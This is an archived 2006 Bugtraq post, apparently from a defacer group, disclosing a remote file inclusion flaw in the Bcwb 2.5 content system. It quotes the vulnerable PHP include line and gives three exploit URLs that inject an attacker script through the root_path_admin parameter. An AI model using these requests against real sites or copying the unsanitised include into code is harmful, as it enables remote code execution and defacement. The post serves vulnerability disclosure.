Home page logo
/

bugtraq logo Bugtraq mailing list archives

Multiple Remote File Include
From: firewall1954 () hotmail com
Date: 30 Oct 2006 17:55:25 -0000

####################### Firewall #########################
      Bcwb 2.5 - Multiple File Include by Firewall
             Latin  American  Defacers
               BuG FounD by Firewall

# Application Affect:
                    Bcwb 2.5

# Sorce Code:             
         http://prdownloads.sourceforge.net/bcwb/bcwb_v25.zip?download

# Code:
       if(! include($root_path_admin.'lang/'.$default_language.'.inc.php') ) die("Can't include 
".$root_path.'lang/'.$default_language.'.inc.php');

# ExPloit :
   http://www.site.com/Bcwb_PATH/include/startup.inc.php?root_path_admin=[Evil Script]

http://www.site.com/Bcwb_PATH/dcontent/default.css.php?root_path_admin=[Evil Script]

http://www.site.com/Bcwb_PATH/system/default.css.php?root_path_admin=[Evil Script]       

# GrEatZ :LAD,C-group,Her0,slackwaren,slappter,Cvir.System,Hanowars,ANtrAX
,napster,saok,Zlevyn,FaLENcE,Azrael,CyberAlexis,krhonoz,RaDaM4nTySS. 

####################### Firewall #########################


  By Date           By Thread  

Current thread:
  • Multiple Remote File Include firewall1954 (Oct 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault